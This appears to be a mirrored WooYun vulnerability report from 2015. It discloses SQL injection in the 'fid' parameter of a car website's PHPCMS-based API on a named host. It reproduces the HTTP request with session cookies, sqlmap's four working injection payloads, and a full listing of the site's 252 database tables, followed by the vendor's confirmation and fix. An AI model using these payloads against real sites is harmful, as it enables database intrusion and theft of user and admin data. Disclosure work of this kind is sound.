乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-08: 细节已通知厂商并且等待厂商处理中 2015-12-08: 厂商已经确认,细节仅向厂商公开 2015-12-18: 细节向核心白帽子及相关领域专家公开 2015-12-28: 细节向普通白帽子公开 2016-01-07: 细节向实习白帽子公开 2016-01-21: 细节向公众公开
GET /index.php?a=ajax_gettypeid&c=api&fid=1&m=auto HTTP/1.1Cookie: PHPSESSID=uvfo5aisjak8bat7tmfocvces3; uvcsU_wap_type_history=7481BARUCVFUUgkBBQ8BBwIDBQYCVABSAFFRVgNXBEwBAlIYA0kBUldOCgYYCVcE; CNZZDATA1279123=cnzz_eid%3D1338230411-1449338650-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1449338650; concern_his=1%3D1449342122079%257C1%257C1%2621%3D1449342303694%257C1%257C1%26655%3D1449342369301%257C1%257C1; compare_list=; concern=1%7C21%7C655; sYQDUGqqzHsearch_history=undefined%7C1; CNZZDATA1253348807=1602830445-1449342412-http%253A%252F%252Fwww.acunetix-referrer.com%252F%7C1449342412; CNZZDATA4510143=cnzz_eid%3D1947046294-1449338128-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1449338128Host: testauto.xizi.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
sqlmap resumed the following injection point(s) from stored session:---Parameter: fid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: a=ajax_gettypeid&c=api&fid=1 AND 9704=9704&m=auto Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: a=ajax_gettypeid&c=api&fid=1 AND (SELECT 3806 FROM(SELECT COUNT(*),CONCAT(0x71787a6271,(SELECT (ELT(3806=3806,1))),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&m=auto Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: a=ajax_gettypeid&c=api&fid=1 AND (SELECT * FROM (SELECT(SLEEP(5)))Euma)&m=auto Type: UNION query Title: Generic UNION query (NULL) - 20 columns Payload: a=ajax_gettypeid&c=api&fid=1 UNION ALL SELECT CONCAT(0x71787a6271,0x6e724f577a494f675a50,0x716a6b6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &m=auto---back-end DBMS: MySQL 5.0Database: auto2013[252 tables]+------------------------------------+| #mysql50#v9_xz_auto_pics( || v9_admin || v9_admin_panel || v9_admin_role || v9_admin_role_priv || v9_announce || v9_attachment || v9_attachment_index || v9_badword || v9_block || v9_block_history || v9_block_priv || v9_cache || v9_category || v9_category_priv || v9_collection_content || v9_collection_history || v9_collection_node || v9_collection_program || v9_comment || v9_comment_check || v9_comment_data_1 || v9_comment_setting || v9_comment_table || v9_content_check || v9_copyfrom || v9_datacall || v9_dbsource || v9_download || v9_download_data || v9_downservers || v9_favorite || v9_form_myform || v9_groupbuy || v9_groupbuy_bak || v9_groupbuy_data || v9_groupbuy_data_bak || v9_hits || v9_ipbanned || v9_job_company || v9_keylink || v9_keyword || v9_keyword_data || v9_link || v9_linkage || v9_log || v9_member || v9_member_detail || v9_member_group || v9_member_menu || v9_member_verify || v9_member_vip || v9_menu || v9_menu_bak || v9_message || v9_message_data || v9_message_group || v9_model || v9_model_field || v9_module || v9_mood || v9_news || v9_news_bak || v9_news_data || v9_news_data_bak || v9_newssale_data || v9_newssale_data_bak || v9_page || v9_pay_account || v9_pay_payment || v9_pay_spend || v9_picture || v9_picture_bak || v9_picture_data || v9_picture_data_bak || v9_position || v9_position3 || v9_position_data || v9_position_data_bak || v9_poster || v9_poster_201012 || v9_poster_201101 || v9_poster_201102 || v9_poster_201103 || v9_poster_201104 || v9_poster_201105 || v9_poster_201106 || v9_poster_201107 || v9_poster_201108 || v9_poster_201109 || v9_poster_201110 || v9_poster_201112 || v9_poster_201201 || v9_poster_201202 || v9_poster_201203 || v9_poster_201204 || v9_poster_201205 || v9_poster_201206 || v9_poster_201207 || v9_poster_201208 || v9_poster_201209 || v9_poster_201210 || v9_poster_201211 || v9_poster_201212 || v9_poster_201301 || v9_poster_201302 || v9_poster_201303 || v9_poster_201310 || v9_poster_201311 || v9_poster_201312 || v9_poster_201401 || v9_poster_201402 || v9_poster_201403 || v9_poster_201404 || v9_poster_201405 || v9_poster_201406 || v9_poster_201408 || v9_poster_201410 || v9_poster_201411 || v9_poster_201412 || v9_poster_201501 || v9_poster_201502 || v9_poster_201503 || v9_poster_space || v9_queue || v9_release_point || v9_search || v9_search_keyword || v9_session || v9_site || v9_special || v9_special_c_data || v9_special_content || v9_sphinx_counter || v9_sso_admin || v9_sso_applications || v9_sso_members || v9_sso_messagequeue || v9_sso_session || v9_sso_settings || v9_template_bak || v9_times || v9_type || v9_urlrule || v9_video_content || v9_video_store || v9_vote_data || v9_vote_option || v9_vote_subject || v9_wap || v9_wap_type || v9_weixin_member || v9_weixin_news_content || v9_weixin_prize || v9_weixin_reply_keyword || v9_weixin_reply_msg || v9_weixin_reply_news || v9_weixin_reply_rule || v9_weixin_share || v9_weixin_site || v9_weixin_site_bak || v9_weixin_site_menu || v9_weixin_site_menu_bak || v9_weixin_test || v9_workflow || v9_xizi_auto_admin || v9_xizi_auto_admin_role || v9_xizi_auto_admin_role_priv || v9_xz_auto_actcode_did || v9_xz_auto_appointment || v9_xz_auto_appointment_time || v9_xz_auto_car_extend || v9_xz_auto_carowner || v9_xz_auto_category || v9_xz_auto_channel_type_news || v9_xz_auto_clue || v9_xz_auto_color || v9_xz_auto_company || v9_xz_auto_customer || v9_xz_auto_customer_action || v9_xz_auto_customer_bak || v9_xz_auto_dealer || v9_xz_auto_dealer_action || v9_xz_auto_dealer_bak || v9_xz_auto_dealer_customer || v9_xz_auto_dealer_customer_bak || v9_xz_auto_dealer_log || v9_xz_auto_dealer_news || v9_xz_auto_dealer_points || v9_xz_auto_dingdan || v9_xz_auto_gb_log || v9_xz_auto_gb_sign || v9_xz_auto_gift || v9_xz_auto_gift_action || v9_xz_auto_gift_action_log || v9_xz_auto_gift_bak || v9_xz_auto_insert || v9_xz_auto_luck || v9_xz_auto_luck_member || v9_xz_auto_luck_user || v9_xz_auto_manufacturer || v9_xz_auto_manufacturer_bak || v9_xz_auto_member || v9_xz_auto_message || v9_xz_auto_model || v9_xz_auto_model_bak_20140912 || v9_xz_auto_model_bak_20141120 || v9_xz_auto_model_news || v9_xz_auto_msg_log || v9_xz_auto_notifylog || v9_xz_auto_order || v9_xz_auto_order_action || v9_xz_auto_order_alarm || v9_xz_auto_order_bak || v9_xz_auto_pics || v9_xz_auto_pics_album || v9_xz_auto_pics_album_bak_20141124 || v9_xz_auto_pics_bak || v9_xz_auto_position || v9_xz_auto_position_data || v9_xz_auto_praise || v9_xz_auto_product || v9_xz_auto_product_cate || v9_xz_auto_product_tag || v9_xz_auto_quote || v9_xz_auto_quote_bak_20141030 || v9_xz_auto_quote_bak_20141030_2 || v9_xz_auto_quote_bak_20141031 || v9_xz_auto_region || v9_xz_auto_saiprice || v9_xz_auto_sales || v9_xz_auto_service || v9_xz_auto_service_bak || v9_xz_auto_service_comment || v9_xz_auto_shop || v9_xz_auto_shop_bak || v9_xz_auto_shop_index || v9_xz_auto_shop_news || v9_xz_auto_shop_product_link || v9_xz_auto_shop_region || v9_xz_auto_shop_welfare_link || v9_xz_auto_style || v9_xz_auto_test || v9_xz_auto_test_action || v9_xz_auto_type || v9_xz_auto_type_bak || v9_xz_auto_type_news || v9_xz_auto_type_style || v9_xz_auto_validate || v9_xz_auto_webhooks_log || v9_xz_auto_welfare || v9_xz_auto_welfare_roll |+------------------------------------+
危害等级:中
漏洞Rank:8
确认时间:2015-12-08 10:57
确认并修复,感谢漏洞作者提交
暂无